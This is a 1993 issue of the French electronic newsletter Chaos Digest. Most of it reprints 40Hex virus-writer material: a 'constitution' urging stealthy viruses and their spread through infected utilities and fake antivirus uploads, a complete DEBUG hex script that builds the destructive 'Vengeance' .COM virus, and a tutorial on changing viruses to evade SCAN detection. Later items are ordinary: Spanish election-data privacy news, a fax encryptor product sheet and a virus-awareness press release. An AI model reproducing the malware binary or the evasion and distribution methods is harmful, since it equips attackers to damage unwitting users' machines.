Chaos Digest Mardi 8 Juin 1993 Volume 1 : Numero 47 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.47 (8 Juin 1993) File 1--File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint) File 2--Elections espagnoles et libertes des donnees (news) File 3--SurFax, boitier de securisation des telecopies (produit) File 4--_Computer Virus Awareness Day_ briefing's (communique) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint) 40Hex Number 5 Volume 2 Issue 1 File 005 ___________________________________________ The Constitution of Worldwide Virus Writers ___________________________________________ Initial Release - February 12, 1992 ___________________________________________ We, the members of PHALCON/SKISM, in order to form a more perfect environment worldwide for the virus community, establish justice, ensure intracommunity tranquility, provide for the common defense and offense, promote the general welfare, and secure the blessings of liberty to ourselves and our posterity, do ordain and establish this Constitution of Worldwide Virus Writers. ARTICLE I - REGARDING ORIGINAL VIRII Section A - DEFINITION The term "original virus" herein indicates programming done exclusively by either one individual or group, with no code taken from any other source, be it a book or another virus. Section B - CODE REQUIREMENTS For an original virus to conform to the standards set by this document, it must include the following: 1) The title of the virus in square brackets followed by a zero byte should be in the code, in a form suitable for inclusion into SCAN(1). This is to ensure that the name of the virus is known to those examining it. 2) The name of the author and his/her group affilition/s should be included in the code, followed by a zero byte. At the present, this is an optional requirement. 3) Some form of encryption or other form of stealth techniques must be used. Even a simple XOR routine will suffice. 4) If the virus infects files, the code should be able to handle infection of read only files. 5) It must have some feature to distinguish it from other virii. Creativity is encouraged above all else. 6) The virus must not be detectable by SCAN. Section C - IMPLEMENTATION This section, and all sections hereafter bearing the heading "IMPLEMENTATION" refer to the recommended method of implementation of the suggestions/requirements listed in the current article. 1) Virus_Name db '[Avocado]',0 2) Author db 'Dark Angel, PHALCON/SKISM',0 ARTICLE II - REGARDING "HACKED" VIRII Section A - DEFINITION The term "hacked virus" herein refers to any virus written by either one individual or a group which includes code taken from any other source, be it a book, a code fragment, or the entire source code from another virus. The term "source virus" herein refers to the virus which spawned the "hacked virus." Section B - CODE REQUIREMENTS For a "hacked" virus to conform to the standards set forth by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The title, author (if available), and affiliation of the author (if available) of the original virus. 2) The author of the hacked virus must give the source code of said virus to the author of the source virus upon demand. 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark Avenger hacks are to be written. 4) The source virus must be improved in some manner (generally in efficiency of speed or size). 5) The hacked virus must significantly differ from the source virus, i.e. it cannot be simply a text change. Section C - IMPLEMENTATION 1) Credit db 'Source stolen from Avocado by Dark Angel of PHALCON/SKISM',0 ARTICLE III - REGARDING VIRAL STRAINS Section A - DEFINITION The term "viral strain" herein refers to any virus written by the original author which does not significantly differ from the original. It generally implies a shrinking in code size, although this is not required. Section B - CODE REQUIREMENTS For a "viral strain" to conform to the standards set by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The name of the virus shall be denoted by the name of the original virus followed by a dash and the version letter. 2) The name of the virus must not change from that of the original strain. 3) A maximum of two strains of the virus can be written. Section C - IMPLEMENTATION 1) Virus_Name db '[Avocado-B]',0 ARTICLE IV - DISTRIBUTION Section A - DEFINITION The term "distribution" herein refers to the transport of the virus through an infected file to the medium of storage of a third (unwitting) party. Section B - INFECTION MEDIUM The distributor shall infect a file with the virus before uploading. Suggested files include: 1) Newly released utility programs. 2) "Hacked" versions of popular anti-viral software, i.e. the version number should be changed, but little else. 3) Beta versions of any program. The infected file, which must actually do something useful, will then be uploaded to a board. The following boards are fair game: 1) PD Boards 2) Lamer boards 3) Boards where the sysop is a dick No virus shall ever be uploaded, especially by the author, directly to an antivirus board, such as HomeBase or Excalibur. Section C - BINARY AND SOURCE CODE AVAILABILITY The binary of the virus shall not be made available until at least two weeks after the initial (illicit) distribution of the virus. Further, the source code, which need not be made available, cannot be released until the latest version of SCAN detects the virus. The source code, should it be made available, should be written in English. Section D - DOCUMENTATION Documentation can be included with the archive containing the binary of the virus, although this is optional. The author should include information about the virus suitable for inclusion in the header of VSUM(2). A simple description will follow, though the author need not reveal any "hidden features" of the virus. Note this serves two purposes: 1) Enable others to effectively spread the virus without fear of self-infection. 2) Ensure that your virus gets a proper listing in VSUM. ARTICLE V - AMENDMENTS Section A - PROCEDURE To propose an amendment, you must first contact a PHALCON/SKISM member through one of our member boards. Leave a message to one of us explaining the proposed change. It will then be considered for inclusion. A new copy of the Constitution will then be drafted and placed on member boards under the filename "PS-CONST.TXT" available for free download by all virus writers. Additionally, an updated version of the constitution will be published periodically in 40HEX. Section B - AMENDMENTS None as of this writing. ARTICLE VI - MISCELLANEOUS Section A - WHO YOU CAN MAKE FUN OF This is a list of people who, over the past few years, have proved themselves to be inept and open to ridicule. 1) Ross M. Greenberg, author of FluShot+ 2) Patricia (What's VSUM?) Hoffman. 2) People who post "I am infected by Jerusalem, what do I do?" or "I have 20 virii, let's trade!" 3) People who don't know the difference between a virus and a trojan. 4) Lamers and "microwares puppies" Section B - WHO YOU SHOULDN'T DIS TOO BADLY This is a list of people who, over the past few years, have proved themselves to be somewhat less inept and open to ridicule than most. 1) John McAfee, nonauthor of SCAN 2) Dennis, true author of SCAN Section C - MOTIVATION In most cases, the motivation for writing a virus should not be the pleasure of seeing someone else's system trashed, but to test one's programming abilities. __________ 1 SCAN is a registered trademark of McAfee Associates. 2 VSUM is a registered trademark of that bitch who doesn't know her own name. +++++ 40Hex Number 5 Volume 2 Issue 1 File 006 ---------------------------------------------------------------------------- PHALCON/SKISM Vengeance virus. Released 02/03/92 Stats: Non-Resident .COM infector. in 40Hex Vmag Infects files larger than 1992 bytes Size of the virus is about 722 bytes Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was online up until January 20th, 1992. On that fateful day, the BBS computer was confiscated by local authorities. Hopefully the board will come back up, and be as good as before... This virus activates the 20th of every month. Just for the fun of it, I'm not going to tell you what this thing does upon activation. I will say one thing unless you have suicidal tendencies, DON'T test it on your own machine, OR the machine of someone you love. It ain't pretty. It IS destructive. (286+) It IS noisy. And it IS named appropriately. Text that can be found in the virus: *** Vengeance is ours! *** PHALCON/SKISM '92 As of Scan 86, this virus isn't found. Since it is based on the Violator virus, other scanners may find it. Oh well. Have fun with this one, just don't run it on the 20th... at least, not on YOUR machine! %%%% DecimatoR /PHALCON/SKISM %%%% --------------------------------------------------------------------------- n veng.com e 0100 EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0110 90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03 e 0120 00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9 e 0130 E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA e 0140 92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00 e 0150 BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04 e 0160 00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7 e 0170 52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03 e 0180 E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B e 0190 75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90 e 01A0 3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80 e 01B0 FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9 e 01C0 06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00 e 01D0 CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00 e 01E0 24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC e 01F0 AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA e 0200 3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89 e 0210 4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8 e 0220 02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8 e 0230 B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4 e 0240 3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00 e 0250 75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B e 0260 C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14 e 0270 02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21 e 0280 72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00 e 0290 CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21 e 02A0 8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD e 02B0 21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6 e 02C0 CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A e 02D0 CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21 e 02E0 BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6 e 02F0 EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81 e 0300 74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2 e 0310 07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00 e 0320 01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E e 0330 67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20 e 0340 2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61 e 0350 6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00 e 0360 00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A e 0370 2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00 e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03E0 00 00 00 00 rcx 03E3 w q +++++ 40Hex Number 5 Volume 2 Issue 1 File 007 HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT PART II In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly tedious) method of searching for scan strings. In short, this was his method: 1) Make a small carrier file. 2) Infect the carrier with the virus. 3) Fill parts of the virus with a dummy value until you isolate the scan string. 4) Modify the virus so it is not detectable, i.e. switch the order of the instructions. The problem is, of course, that step 3 takes a maddeningly inordinate amount of time. I shall present a tip which will save you much time. The trick is, of course, to find out where the encryption mechanism and hence the unencrypted portion where the scan string is usually located. Once the encryption mechanism is located, isolating the scan string is much simpler. Of course, the problem is finding the encryption mechanism in the first place. The simplest method of doing this is using V Communication's Sourcer 486, or any similar dissassembler. Dissassemble the file and search for the unencrypted portions. Most of the file will be DBs, so search for any part which isn't. Once you have located those parts, all you have to do is subtract 100h from the memory location to find its physical offset in the file. You now have a general idea of where the scan string is located, so perform step 3 until you find it. Ack, you say, what if you don't have Sourcer? Well, all is not lost. Load up the infected carrier in good old DEBUG. The first instruction (in COM infections) should be a JMP. Trace (T) into the JMP and you should be thrown into the area around the encryption mechanism. Use the memory offset (relative to the PSP segment) and subtract 100h to find the physical location of the unencrypted portion in the file. Once again, once you have this, perform step 3. Simple, no? Sometimes, SCAN looks for the writing portion of the code, which generally calls INT 21h, function 40h. This is usually, though not always, located somewhere near the encryption mechanism. If it is not near there, all you have to do is trace through the virus until it calls the write file function. Another method of looking for scan codes is to break the infected carrier file into a series of 50 byte overlapping chunks. For example, the first chunk would be from offset 0 to 49, the second from 24 to 74, the third from 49 to 99, etc. Then use SCAN to see which chunk holds the scan code. This is by far the easiest, not to mention quickest, method. One side note on step 1, making the carrier file. Some virii don't infect tiny files. What you must do is create a larger file (duh). Simply assemble the following two lines: int 20h db 98 dup (0) (with all the garbage segment declarations and shit, of course) and you'll have a nice 100 byte carrier which should be sufficient in most cases, with maybe the exception of the Darth Vaders. Enjoy! Dark Angel ------------------------------ Date: Mon Jun 7 22:05:44 -0100 1993 From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo ) Subject: File 2--Elections espagnoles et libertes des donnees (news) CCCCC LL II CC LL II CC LL II -- N E W S FROM S P A I N --- June 7, 1993 CCCCC LLLLLL II COMMISSION for LIBERTIES and INFORMATICS (*) PRIVACY AND GENERAL ELECTIONS: TRICKS OF THE TRADE ++++++++++++++++++++++++++++++++++++++++++++++++++ Spain held general parlamentary elections yesterday, June 6th. Regardless of the ocutcome (the ruling Socialist Party obtained again a majority of the seats), one of the parties participating in the event, "Centrist Unity-Spanish Democratic Party", was expelled of the race on June 1 by the Electoral Control Committee on the grounds that the party was actually a sham put up by a group of direct marketing pirates. It is not the first time it happens but it is the first time corrective actions are taken again such violations. Regardless of the fact that this party had no choice whatsoever of winning a single seat, it showed again one of the problems that has been plaguing citizens' privacy in Spain since 1977 (first democratic elections after forty years of dictatorship): the use for commercial purposes of the magnetic tapes containing the Election Census, provided to the parties by the Public Administration. Big parties do not seem to have participated in data smuggling practices but there is evidence that many of the companies that process the tapes provided by them are the main source of abuse against the privacy of citizens in regard to their personal data in Spain, since they duplicate and sell the tapes. This fact has been frequently dennounced by CLI (*). The recently approved Personal Data Law could help to stop these practices. * SOME WORDS ABOUT CLI The --Commission for Liberties and Informatics, CLI-- is an independent and pluralistic organization that was officially constituted in April'91. Its mission is to "promote the development and protection of citizens' rights, specially privacy, against misuse of Information Technologies". As of May '93, CLI is composed by nine organizations, with a joint membership of about 3,000,000 people. They cover a very wide spectrum of social interest groups: associations of computer professionals, judges, civil rights leagues, trade unions, consumers groups, direct marketing industry, etc. CLI is confederated with similar bodies created in some other Spanish Regions such as Valencia, Basque Country and Catalonia, and has fluid working relationships with many public and private Data Protection bodies and entities all over the world, including CNIL, CPSR and Privacy International. CLI has its headquarters in: Padilla 66, 3 dcha. E-28006 Madrid, Spain Phone: (34-1) 402 9391 Fax: (34-1) 309 3685 E-mail: rfcalvo@guest2.atimdr.es ------------------------------ Date: Tue Jun 8 06:06:17 EDT 1993 From: celma_s@epita.fr (Samuel Celma ) Subject: File 3--SurFax, boitier de securisation des telecopies (produit) SURFAX High Security Encryption System for Facsimile Communication * Connected between any GIII facsimile equipment and the telephone line; * Use a high performance crypto algorithm (2'(59) = 10'(18) possible cipher keys); * Designed for finance, commercial and industrial operations; * very easy and friendly handling. SurFax, used on both side of the PSTN with group 3 fax, provides security for all the transmitted documents. Installation +------------ +-----+ +--------+ +--------1 +--------+ +-----+ | Fax |====| Surfax |=====> | PSTN | <=====| Surfax |====| Fax | +-----+ +--------+ +--------+ +--------+ +-----+ Simply plugin and add-on No modification required to the fax equipment Operation +--------- 10-key keyboard 16 digits LCD display Secret key handling with keyboard Plain mode / encryption mode selectable with keyboard and hardkey Dimensions: 16 x 20 x 12 cm Weight: approx. 1.3 kg Power: 110/200 VAC, 50/60 Hz Facsimile Technical Specifications +---------------------------------- Two facsimile modems Transmission speed: 9600/7200/4800/2400 bit/s (CCITT V29, V27ter, V21) Designed to work with Group III facsimile equipments Fully compatible for transmission to non-crypto fax equipment (T30 protocol) Security Features +----------------- SurFax is a secret key system type. (1) KEY MANAGEMENT The system has an integrated key management. The user has to enter his 8 figures secret key on keyboard. A physical key allows the user to let Surfax in the chosen mode (plain or cipher). Otherwise, secret key can be erased at any time at the touch of a button, and is automatically erased after each communication. A 32-bit session key is generated by a "built-in" random number generator. Both secret and session keys are combined into a cypher key (2'(59) possible values) on each terminal. Both secret and session keys are never transferred in clear between the two terminals. A new cypher key is created for each transmitted page. Closed user groups can be created by request to the manufacturer (by setting a customer specific parameter). (2) CIPHER TECHNOLOGY The K.E.A. (KTT Encryption Algorithm) is KTT proprietary. It is a realtime data ciphering process and is used to encrypt only the facsimile data. It is based on a random generator, which initial state relies on a cipher key, issued from a secret key and a session key (2'(59)). More informations +----------------- Mr David COHEN SKTT Henry Kam Technologies & Telecommunations 2d rue de l'Epine Prolongee 93541 Bagnolet Cedex Phone: +33 1 42 87 54 00 Fax: +33 1 42 87 23 91 ------------------------------ Date: Tue Jun 8 06:06:17 EDT 1993 From: ae446@freenet.carleton.ca (Nigel Allen ) Subject: File 4--_Computer Virus Awareness Day_ briefing's (communique) Press Release from the National Computer Security Association. Rep. Fields to sponsor Computer Virus Awareness Day briefing; Rep. Markey to speak to NCSA To: Assignment Desk, Daybook Editor Contact: Larry Teien of 3M Data Storage Products, St. Paul, Minn., 612-736-5961, or Bob Bales of the National Computer Security Association, Carlisle, Pa., 717-258-1816, or Ken Greenberg of Fleishman-Hillard Inc., Los Angeles, 213-629-4974 News Advisory: WHAT: National Computer Virus Awareness Day Congressional briefing on the virus threat and recommended remedial action, sponsored by Rep. Jack Fields (R-Texas), ranking Republican on the House Subcommittee on Telecommunications and Finance; and an informational exhibit about computer virus control and information security. WHERE: Rayburn House Office Building, Washington, D.C., Room 2257 WHEN: Wednesday, June 9 8:30 a.m. to 9:30 a.m. -- Panelist presentations 9:30 a.m. to 10:30 a.m. -- Media Q&A WHO: Co-sponsored by 3M Co. and the National Computer Security Association (NCSA). Endorsed by the American Electronics Association, the Electronic Industries Association and the Microcomputer Managers Association. Panel members to include representatives of NYNEX, Rockwell International and the Departments of Justice and Defense, as well as 3M and NCSA. ALSO: 3M/NCSA Congressional dinner, featuring Rep. Edward J. Markey (D-Mass.), chairman of the House Subcommittee on Telecommunications and Finance. Cotillion Room, Sheraton Washington Hotel 2660 Woodley Road N.W.; 7:45 p.m. on June 10 -- Nigel Allen, Toronto, Ontario, Canada ae446@freenet.carleton.ca ------------------------------ End of Chaos Digest #1.47 ************************************